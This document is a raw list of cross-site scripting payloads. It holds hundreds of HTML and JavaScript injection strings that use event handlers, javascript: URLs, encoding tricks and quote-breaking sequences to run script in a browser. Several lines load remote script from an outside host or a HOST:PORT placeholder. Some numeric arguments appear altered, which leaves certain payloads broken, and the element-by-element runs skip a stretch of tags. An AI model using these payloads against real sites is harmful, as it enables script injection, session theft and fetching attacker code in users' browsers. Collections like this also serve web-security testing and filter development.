"-prompt(277)-"
'-prompt(664)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](324)")-'
"-eval("window['pro'%2B'mpt'](193)")-"
"onclick=prompt(357)>"@x.y
"onclick=prompt(771)><svg/onload=prompt(122)>"@x.y
<image/src/onerror=prompt(699)>
<img/src/onerror=prompt(235)>
<image src/onerror=prompt(734)>
<img src/onerror=prompt(558)>
<image src =q onerror=prompt(628)>
<img src =q onerror=prompt(875)>
</scrip</script>t><img src =q onerror=prompt(549)>
<svg onload=alert(432)>
"><svg onload=alert(948)//
"onmouseover=alert(935)//
"autofocus/onfocus=alert(167)//
'-alert(451)-'
'-alert(288)//
\'-alert(815)//
</script><svg onload=alert(981)>
<x contenteditable onblur=alert(787)>lose focus! 
<x onclick=alert(233)>click this! 
<x oncopy=alert(883)>copy this! 
<x oncontextmenu=alert(294)>right click this! 
<x oncut=alert(306)>copy this! 
<x ondblclick=alert(501)>double click this! 
<x ondrag=alert(164)>drag this! 
<x contenteditable onfocus=alert(795)>focus this! 
<x contenteditable oninput=alert(673)>input here! 
<x contenteditable onkeydown=alert(652)>press any key! 
<x contenteditable onkeypress=alert(983)>press any key! 
<x contenteditable onkeyup=alert(950)>press any key! 
<x onmousedown=alert(232)>click this! 
<x onmousemove=alert(437)>hover this! 
<x onmouseout=alert(463)>hover this! 
<x onmouseover=alert(621)>hover this! 
<x onmouseup=alert(543)>click this! 
<x contenteditable onpaste=alert(918)>paste here!
<script>alert(360)// 
<script>alert(143)<!–
<script src=//brutelogic.com.br/1.js> 
<script src=//3334957647/1>
%3Cx onxxx=alert(162) 
<%78 onxxx=1 
<x %6Fnxxx=1 
<x o%6Exxx=1 
<x on%78xx=1 
<x onxxx%3D1
<X onxxx=1 
<x OnXxx=1 
<X OnXxx=1 
<x onxxx=1 onxxx=1
<x/onxxx=1 
<x%09onxxx=1 
<x%0Aonxxx=1 
<x%0Conxxx=1 
<x%0Donxxx=1 
<x%2Fonxxx=1 
<x 1='1'onxxx=1 
<x 1="1"onxxx=1
<x </onxxx=1 
<x 1=">" onxxx=1 
<http://onxxx%3D1/
<x onxxx=alert(688) 1='
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(968)><svg/1='
'>alert(629)</script><script/1=' 
*/alert(438)</script><script>/*
*/alert(248)">'onload="/*<svg/1='
`-alert(328)">'onload="`<svg/1='
*/</script>'>alert(852)/*<script/1='
<script>alert(565)</script> 
<script src=javascript:alert(240)> 
<iframe src=javascript:alert(127)> 
<embed src=javascript:alert(391)> 
<a href=javascript:alert(574)>click 
<math><brute href=javascript:alert(103)>click 
<form action=javascript:alert(443)><input type=submit> 
<isindex action=javascript:alert(575) type=submit value=click> 
<form><button formaction=javascript:alert(435)>click 
<form><input formaction=javascript:alert(910) type=submit value=click> 
<form><input formaction=javascript:alert(379) type=image value=click> 
<form><input formaction=javascript:alert(941) type=image src=SOURCE> 
<isindex formaction=javascript:alert(701) type=submit value=click> 
<object data=javascript:alert(613)> 
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
<svg><script xlink:href=data:,alert(385) /> 
<math><brute xlink:href=javascript:alert(368)>click 
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(833) to=&>
<html ontouchstart=alert(220)> 
<html ontouchend=alert(380)> 
<html ontouchmove=alert(402)> 
<html ontouchcancel=alert(559)>
<body onorientationchange=alert(682)>
"><img src=1 onerror=alert(554)>.gif
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF89a/*<svg/onload=alert(838)>*/=alert(document.domain)//;
<script src="data:&comma;alert(949)//
"><script src=data:&comma;alert(813)//
<script src="//brutelogic.com.br&sol;1.js&num; 
"><script src=//brutelogic.com.br&sol;1.js&num; 
<link rel=import href="data:text/html&comma;&lt;script&gt;alert(806)&lt;&sol;script&gt; 
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(711)&lt;&sol;script&gt;
<base href=//0>
<script/src="data:&comma;eval(atob(location.hash.slice(603)))//#alert(285)
<body onload=alert(580)>
<body onpageshow=alert(509)>
<body onfocus=alert(422)>
<body onhashchange=alert(512)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(947) id=x>#x
<body onscroll=alert(254)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(896)>press F12!
<body onhelp=alert(893)>press F1! (MSIE)
<marquee onstart=alert(656)>
<marquee loop=1 width=0 onfinish=alert(778)>
<audio src onloadstart=alert(406)>
<video onloadstart=alert(675)><source>
<input autofocus onblur=alert(390)>
<keygen autofocus onfocus=alert(470)>
<form onsubmit=alert(600)><input type=submit>
<select onchange=alert(752)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(301)>right click me!
alert`1`
alert&lpar;1&rpar;
alert&#x28;1&#x29
alert&#40;1&#41
(alert)(358)
a=alert,a(832)
[1].find(alert)
top["al"+"ert"](471)
top[/al/.source+/ert/.source](666)
al\u0065rt(174)
top['al\145rt'](336)
top['al\x65rt'](740)
top[8680439..toString(30)](759)
navigator.vibrate(500)
eval(URL.slice(-8))>#alert(777)
eval(location.hash.slice(785)>#alert(451)
innerHTML=location.hash>#<script>alert(340)</script>
<a draggable="true" ondrag="alert(371)">test</a>
<a draggable="true" ondragend="alert(406)">test</a>
<a draggable="true" ondragenter="alert(928)">test</a>
<a draggable="true" ondragleave="alert(625)">test</a>
<a draggable="true" ondragstart="alert(550)">test</a>
<a id=x tabindex=1 onactivate=alert(927)></a>
<a id=x tabindex=1 onbeforeactivate=alert(226)></a>
<a id=x tabindex=1 onbeforedeactivate=alert(752)></a><input autofocus>
<a id=x tabindex=1 ondeactivate=alert(608)></a><input id=y autofocus>
<a id=x tabindex=1 onfocus=alert(110)></a>
<a id=x tabindex=1 onfocusin=alert(187)></a>
<a onbeforecopy="alert(944)" contenteditable>test</a>
<a onbeforecut="alert(343)" contenteditable>test</a>
<a onbeforepaste="alert(222)" contenteditable>test</a>
<a onblur=alert(614) tabindex=1 id=x></a><input autofocus>
<a onclick="alert(147)">test</a>
<a oncontextmenu="alert(549)">test</a>
<a oncopy="alert(682)" contenteditable>test</a>
<a oncut="alert(819)" contenteditable>test</a>
<a ondblclick="alert(919)">test</a>
<a onfocusout=alert(754) tabindex=1 id=x></a><input autofocus>
<a onkeydown="alert(924)" contenteditable>test</a>
<a onkeypress="alert(752)" contenteditable>test</a>
<a onkeyup="alert(171)" contenteditable>test</a>
<a onmousedown="alert(240)">test</a>
<a onmouseenter="alert(860)">test</a>
<a onmouseleave="alert(614)">test</a>
<a onmousemove="alert(383)">test</a>
<a onmouseout="alert(740)">test</a>
<a onmouseover="alert(806)">test</a>
<a onmouseup="alert(151)">test</a>
<a onpaste="alert(685)" contenteditable>test</a>
<abbr draggable="true" ondrag="alert(363)">test</abbr>
<abbr draggable="true" ondragend="alert(854)">test</abbr>
<abbr draggable="true" ondragenter="alert(891)">test</abbr>
<abbr draggable="true" ondragleave="alert(315)">test</abbr>
<abbr draggable="true" ondragstart="alert(480)">test</abbr>
<abbr id=x tabindex=1 onactivate=alert(314)></abbr>
<abbr id=x tabindex=1 onbeforeactivate=alert(126)></abbr>
<abbr id=x tabindex=1 onbeforedeactivate=alert(618)></abbr><input autofocus>
<abbr id=x tabindex=1 ondeactivate=alert(917)></abbr><input id=y autofocus>
<abbr id=x tabindex=1 onfocus=alert(308)></abbr>
<abbr id=x tabindex=1 onfocusin=alert(963)></abbr>
<abbr onbeforecopy="alert(316)" contenteditable>test</abbr>
<abbr onbeforecut="alert(893)" contenteditable>test</abbr>
<abbr onbeforepaste="alert(399)" contenteditable>test</abbr>
<abbr onblur=alert(948) tabindex=1 id=x></abbr><input autofocus>
<abbr onclick="alert(368)">test</abbr>
<abbr oncontextmenu="alert(710)">test</abbr>
<abbr oncopy="alert(365)" contenteditable>test</abbr>
<abbr oncut="alert(732)" contenteditable>test</abbr>
<abbr ondblclick="alert(239)">test</abbr>
<abbr onfocusout=alert(305) tabindex=1 id=x></abbr><input autofocus>
<abbr onkeydown="alert(705)" contenteditable>test</abbr>
<strike id=x tabindex=1 onbeforedeactivate=alert(294)></strike><input autofocus>
<strike id=x tabindex=1 ondeactivate=alert(892)></strike><input id=y autofocus>
<strike id=x tabindex=1 onfocus=alert(704)></strike>
<strike id=x tabindex=1 onfocusin=alert(362)></strike>
<strike onbeforecopy="alert(168)" contenteditable>test</strike>
<strike onbeforecut="alert(658)" contenteditable>test</strike>
<strike onbeforepaste="alert(383)" contenteditable>test</strike>
<strike onblur=alert(402) tabindex=1 id=x></strike><input autofocus>
<strike onclick="alert(517)">test</strike>
<strike oncontextmenu="alert(477)">test</strike>
<strike oncopy="alert(334)" contenteditable>test</strike>
<strike oncut="alert(223)" contenteditable>test</strike>
<strike ondblclick="alert(613)">test</strike>
<strike onfocusout=alert(174) tabindex=1 id=x></strike><input autofocus>
<strike onkeydown="alert(385)" contenteditable>test</strike>
<strike onkeypress="alert(343)" contenteditable>test</strike>
<strike onkeyup="alert(574)" contenteditable>test</strike>
<strike onmousedown="alert(766)">test</strike>
<strike onmouseenter="alert(430)">test</strike>
<strike onmouseleave="alert(747)">test</strike>
<strike onmousemove="alert(896)">test</strike>
<strike onmouseout="alert(771)">test</strike>
<strike onmouseover="alert(374)">test</strike>
<strike onmouseup="alert(236)">test</strike>
<strike onpaste="alert(248)" contenteditable>test</strike>
<strong draggable="true" ondrag="alert(825)">test</strong>
<strong draggable="true" ondragend="alert(104)">test</strong>
<strong draggable="true" ondragenter="alert(889)">test</strong>
<strong draggable="true" ondragleave="alert(826)">test</strong>
<strong draggable="true" ondragstart="alert(778)">test</strong>
<strong id=x tabindex=1 onactivate=alert(245)></strong>
<strong id=x tabindex=1 onbeforeactivate=alert(886)></strong>
<strong id=x tabindex=1 onbeforedeactivate=alert(734)></strong><input autofocus>
<strong id=x tabindex=1 ondeactivate=alert(776)></strong><input id=y autofocus>
<strong id=x tabindex=1 onfocus=alert(475)></strong>
<strong id=x tabindex=1 onfocusin=alert(767)></strong>
<strong onbeforecopy="alert(775)" contenteditable>test</strong>
<strong onbeforecut="alert(617)" contenteditable>test</strong>
<strong onbeforepaste="alert(209)" contenteditable>test</strong>
<strong onblur=alert(155) tabindex=1 id=x></strong><input autofocus>
<strong onclick="alert(120)">test</strong>
<strong oncontextmenu="alert(799)">test</strong>
<strong oncopy="alert(732)" contenteditable>test</strong>
<strong oncut="alert(711)" contenteditable>test</strong>
<strong ondblclick="alert(439)">test</strong>
<strong onfocusout=alert(618) tabindex=1 id=x></strong><input autofocus>
<strong onkeydown="alert(358)" contenteditable>test</strong>
<strong onkeypress="alert(595)" contenteditable>test</strong>
<strong onkeyup="alert(431)" contenteditable>test</strong>
<strong onmousedown="alert(755)">test</strong>
<strong onmouseenter="alert(938)">test</strong>
<strong onmouseleave="alert(635)">test</strong>
<strong onmousemove="alert(739)">test</strong>
<strong onmouseout="alert(419)">test</strong>
<strong onmouseover="alert(902)">test</strong>
<strong onmouseup="alert(902)">test</strong>
<strong onpaste="alert(481)" contenteditable>test</strong>
<style draggable="true" ondrag="alert(315)">test</style>
<style draggable="true" ondragend="alert(234)">test</style>
<style draggable="true" ondragenter="alert(939)">test</style>
<style draggable="true" ondragleave="alert(184)">test</style>
<style draggable="true" ondragstart="alert(607)">test</style>
<style id=x tabindex=1 onactivate=alert(207)></style>
<style id=x tabindex=1 onbeforeactivate=alert(914)></style>
<style id=x tabindex=1 onbeforedeactivate=alert(365)></style><input autofocus>
<style id=x tabindex=1 ondeactivate=alert(163)></style><input id=y autofocus>
<style id=x tabindex=1 onfocus=alert(436)></style>
<style id=x tabindex=1 onfocusin=alert(110)></style>
<style onbeforecopy="alert(407)" contenteditable>test</style>
<style onbeforecut="alert(539)" contenteditable>test</style>
<style onbeforepaste="alert(581)" contenteditable>test</style>
<style onblur=alert(387) tabindex=1 id=x></style><input autofocus>
<style onclick="alert(977)">test</style>
<style oncontextmenu="alert(972)">test</style>
<style oncopy="alert(994)" contenteditable>test</style>
<style oncut="alert(901)" contenteditable>test</style>
<style ondblclick="alert(929)">test</style>
<style onfocusout=alert(190) tabindex=1 id=x></style><input autofocus>
<style onkeydown="alert(886)" contenteditable>test</style>
<style onkeypress="alert(275)" contenteditable>test</style>
<style onkeyup="alert(458)" contenteditable>test</style>
<style onload=alert(433)></style>
<style onmousedown="alert(128)">test</style>
<style onmouseenter="alert(420)">test</style>
<style onmouseleave="alert(875)">test</style>
<style onmousemove="alert(479)">test</style>
<style onmouseout="alert(118)">test</style>
<style onmouseover="alert(218)">test</style>
<style onmouseup="alert(501)">test</style>
<style onpaste="alert(379)" contenteditable>test</style>
<style onreadystatechange=alert(444)></style>
<style>* {color:red;}</style>
<style>html {color:red;}</style>
<style>body {color:red;}</style>
<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(880)></a>
<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(957)></abbr>
<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(573)></acronym>
<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(445)></address>
<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(566)></applet>
<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(759)></area>
<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(148)></article>
<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(904)></aside>
<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(298)></audio>
<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(105)></b>
<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(882)></base>
<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(507)></basefont>
<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(596)></bdi>
<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(468)></bdo>
<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(922)></bgsound>
<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(859)></big>
<style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(217)></blink>
<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(479)></blockquote>
<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(573)></body>
<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(779)></br>
<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(676)></button>
<style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(852)></canvas>
<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(520)></caption>
<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(779)></center>
<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(409)></cite>
<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(848)></code>
<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(194)></col>
<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(284)></colgroup>
<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(786)></command>
<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(657)></content>
<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(703)></data>
<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(703)></datalist>
<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(893)></dd>
<style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(571)></del>
<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(384)></details>
<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(139)></dfn>
<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(808)></dialog>
<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(207)></dir>
<style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(670)></div>
<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(383)></dl>
<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(623)></dt>
<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(400)></element>
<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(471)></em>
<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(866)></embed>
<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(155)></fieldset>
<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(645)></figcaption>
<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(734)></figure>
<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(766)></font>
<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(663)></footer>
<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(576)></form>
<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(219)></frame>
<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(929)></frameset>
<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(600)></h1>
<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(334)></head>
<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(284)></header>
<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(339)></hgroup>
<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(150)></hr>
<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(689)></html>
<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(765)></i>
<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(615)></iframe>
<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(967)></image>
<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(985)></img>
<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(621)></input>
<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(641)></ins>
<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(462)></isindex>
<style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(227)></kbd>
<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(160)></keygen>
<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(491)></label>
<style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(186)></legend>
<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(833)></li>
<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(455)></link>
<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(236)></listing>
<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(183)></main>
<style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(490)></map>
<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(762)></mark>
<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(764)></marquee>
<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(934)></menu>
<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(291)></menuitem>
<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(851)></meta>
<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(482)></meter>
<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(498)></multicol>
<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(772)></nav>
<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(299)></nextid>
<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(358)></nobr>
<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(132)></noembed>
<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(641)></noframes>
<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(719)></noscript>
<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(808)></object>
<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(954)></ol>
<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(132)></optgroup>
<style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(517)></option>
<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(759)></output>
<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(883)></p>
<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(723)></param>
<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(551)></picture>
<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(405)></plaintext>
<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(105)></pre>
<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(769)></progress>
<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(423)></q>
<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(224)></rb>
<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(820)></rp>
<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(623)></rt>
<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(580)></rtc>
<style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(818)></ruby>
<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(399)></s>
<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(604)></samp>
<u onkeypress="alert(505)" contenteditable>test</u>
<u onkeyup="alert(298)" contenteditable>test</u>
<u onmousedown="alert(895)">test</u>
<u onmouseenter="alert(889)">test</u>
<u onmouseleave="alert(174)">test</u>
<u onmousemove="alert(556)">test</u>
<u onmouseout="alert(386)">test</u>
<u onmouseover="alert(924)">test</u>
<u onmouseup="alert(610)">test</u>
<u onpaste="alert(945)" contenteditable>test</u>
<ul draggable="true" ondrag="alert(288)">test</ul>
<ul draggable="true" ondragend="alert(448)">test</ul>
<ul draggable="true" ondragenter="alert(603)">test</ul>
<ul draggable="true" ondragleave="alert(435)">test</ul>
<ul draggable="true" ondragstart="alert(349)">test</ul>
<ul id=x tabindex=1 onactivate=alert(202)></ul>
<ul id=x tabindex=1 onbeforeactivate=alert(956)></ul>
<ul id=x tabindex=1 onbeforedeactivate=alert(312)></ul><input autofocus>
<ul id=x tabindex=1 ondeactivate=alert(338)></ul><input id=y autofocus>
<ul id=x tabindex=1 onfocus=alert(270)></ul>
<ul id=x tabindex=1 onfocusin=alert(814)></ul>
<ul onbeforecopy="alert(683)" contenteditable>test</ul>
<ul onbeforecut="alert(504)" contenteditable>test</ul>
<ul onbeforepaste="alert(976)" contenteditable>test</ul>
<ul onblur=alert(783) tabindex=1 id=x></ul><input autofocus>
<ul onclick="alert(556)">test</ul>
<ul oncontextmenu="alert(679)">test</ul>
<ul oncopy="alert(852)" contenteditable>test</ul>
<ul oncut="alert(878)" contenteditable>test</ul>
<ul ondblclick="alert(584)">test</ul>
<ul onfocusout=alert(576) tabindex=1 id=x></ul><input autofocus>
<ul onkeydown="alert(759)" contenteditable>test</ul>
<ul onkeypress="alert(204)" contenteditable>test</ul>
<ul onkeyup="alert(635)" contenteditable>test</ul>
<ul onmousedown="alert(466)">test</ul>
<ul onmouseenter="alert(208)">test</ul>
<ul onmouseleave="alert(702)">test</ul>
<ul onmousemove="alert(989)">test</ul>
<ul onmouseout="alert(281)">test</ul>
<ul onmouseover="alert(189)">test</ul>
<ul onmouseup="alert(403)">test</ul>
<ul onpaste="alert(503)" contenteditable>test</ul>
<var draggable="true" ondrag="alert(736)">test</var>
<var draggable="true" ondragend="alert(530)">test</var>
<var draggable="true" ondragenter="alert(969)">test</var>
<var draggable="true" ondragleave="alert(187)">test</var>
<var draggable="true" ondragstart="alert(871)">test</var>
<var id=x tabindex=1 onactivate=alert(774)></var>
<var id=x tabindex=1 onbeforeactivate=alert(650)></var>
<var id=x tabindex=1 onbeforedeactivate=alert(988)></var><input autofocus>
<var id=x tabindex=1 ondeactivate=alert(286)></var><input id=y autofocus>
<var id=x tabindex=1 onfocus=alert(883)></var>
<var id=x tabindex=1 onfocusin=alert(587)></var>
<var onbeforecopy="alert(563)" contenteditable>test</var>
<var onbeforecut="alert(114)" contenteditable>test</var>
<var onbeforepaste="alert(771)" contenteditable>test</var>
<var onblur=alert(110) tabindex=1 id=x></var><input autofocus>
<var onclick="alert(531)">test</var>
<var oncontextmenu="alert(522)">test</var>
<var oncopy="alert(879)" contenteditable>test</var>
<var oncut="alert(875)" contenteditable>test</var>
<var ondblclick="alert(706)">test</var>
<var onfocusout=alert(638) tabindex=1 id=x></var><input autofocus>
<var onkeydown="alert(821)" contenteditable>test</var>
<var onkeypress="alert(844)" contenteditable>test</var>
<var onkeyup="alert(735)" contenteditable>test</var>
<var onmousedown="alert(966)">test</var>
<var onmouseenter="alert(367)">test</var>
<var onmouseleave="alert(734)">test</var>
<var onmousemove="alert(287)">test</var>
<var onmouseout="alert(576)">test</var>
<var onmouseover="alert(779)">test</var>
<var onmouseup="alert(992)">test</var>
<var onpaste="alert(994)" contenteditable>test</var>
<video autoplay controls onpause=alert(731)><source src="validvideo.mp4" type="video/mp4"></video>
<video autoplay controls onseeked=alert(262)><source src="validvideo.mp4" type="video/mp4"></video>
<video autoplay controls onseeking=alert(766)><source src="validvideo.mp4" type="video/mp4"></video>
<video autoplay controls onvolumechange=alert(452)><source src="validvideo.mp4" type="video/mp4"></video>
<video autoplay controls onwaiting=alert(721)><source src="validvideo.mp4" type=video/mp4></video>
<video autoplay onloadedmetadata=alert(253)> <source src="validvideo.mp4" type="video/mp4"></video>
<video autoplay onplay=alert(764)><source src="validvideo.mp4" type="video/mp4"></video>
<video autoplay onplaying=alert(444)><source src="validvideo.mp4" type="video/mp4"></video>
<video controls autoplay onended=alert(681)><source src="validvideo.mp4" type="video/mp4"></video>
<video controls autoplay ontimeupdate=alert(638)><source src="validvideo.mp4" type="video/mp4"></video>
<video draggable="true" ondrag="alert(156)">test</video>
<video draggable="true" ondragend="alert(397)">test</video>
<video draggable="true" ondragenter="alert(829)">test</video>
<video draggable="true" ondragleave="alert(866)">test</video>
<video draggable="true" ondragstart="alert(783)">test</video>
<video id=x controls onfocus=alert(464)><source src="validvideo.mp4" type=video/mp4></video>
<video id=x controls onfocusin=alert(311)><source src="validvideo.mp4" type=video/mp4></video>
<video id=x tabindex=1 onactivate=alert(480)></video>
<video id=x tabindex=1 onbeforeactivate=alert(853)></video>
<video id=x tabindex=1 onbeforedeactivate=alert(761)></video><input autofocus>
<video id=x tabindex=1 ondeactivate=alert(880)></video><input id=y autofocus>
<video onbeforecopy="alert(500)" contenteditable>test</video>
<video onbeforecut="alert(325)" contenteditable>test</video>
<video onbeforepaste="alert(610)" contenteditable>test</video>
<video onblur=alert(118) tabindex=1 id=x></video><input autofocus>
<video oncanplay=alert(857)><source src="validvideo.mp4" type="video/mp4"></video>
<video oncanplaythrough=alert(967)><source src="validvideo.mp4" type="video/mp4"></video>
<video onclick="alert(156)">test</video>
<video oncontextmenu="alert(960)">test</video>
<video oncopy="alert(133)" contenteditable>test</video>
<video oncut="alert(208)" contenteditable>test</video>
<video ondblclick="alert(761)">test</video>
<video onfocusout=alert(788) tabindex=1 id=x></video><input autofocus>
<video onkeydown="alert(980)" contenteditable>test</video>
<video onkeypress="alert(626)" contenteditable>test</video>
<video onkeyup="alert(725)" contenteditable>test</video>
<video onloadeddata=alert(339)><source src="validvideo.mp4" type="video/mp4"></video>
<video onmousedown="alert(511)">test</video>
<video onmouseenter="alert(370)">test</video>
<video onmouseleave="alert(236)">test</video>
<video onmousemove="alert(697)">test</video>
<video onmouseout="alert(705)">test</video>
<video onmouseover="alert(701)">test</video>
<video onmouseup="alert(103)">test</video>
<video onpaste="alert(862)" contenteditable>test</video>
<video src/onerror=alert(711)>
<video><source onerror=alert(916) src=1></video>
<video><track default onload=alert(184) src="data:text/vtt,WEBVTT"></video>
<wbr draggable="true" ondrag="alert(110)">test</wbr>
